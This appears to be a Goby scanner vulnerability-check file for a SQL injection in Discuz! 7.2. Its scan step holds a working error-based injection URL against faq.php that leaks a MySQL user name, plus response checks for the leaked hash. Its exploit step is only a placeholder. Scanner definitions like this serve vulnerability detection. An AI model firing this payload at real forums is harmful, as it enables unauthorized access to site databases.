{
"Name" : "Discuz v72 SQLI" ,
"Level" : "2" ,
"Tags" : [
"sqli"
] ,
"GobyQuery" : "app=\"Discuz\" || body=\"Powered by Discuz!\"" ,
"Description" : "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases." ,
"Product" : "Discuz!" ,
"Homepage" : "https://www.discuz.net/" ,
"Author" : "" ,
"Impact" : "Discuz! 7.2 has a SQL injection vulnerability." ,
"Recommendation" : "" ,
"References" : [
"https://blog.csdn.net/weixin_40709439/article/details/82780606"
] ,
"HasExp" : true ,
"ExpParams" : null ,
"ExpTips" : {
"Type" : "" ,
"Content" : ""
} ,
"ScanSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 " ,
"follow_redirect" : false ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "81dc9bdb52d04dc20036dbd8313ed055" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "Discuz! info</b>: MySQL Query Error" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
"ExploitSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/test.php" ,
"follow_redirect" : true ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "test" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
"PostTime" : "0000-00-00 00:00:00" ,
"GobyVersion" : "0.0.0"
}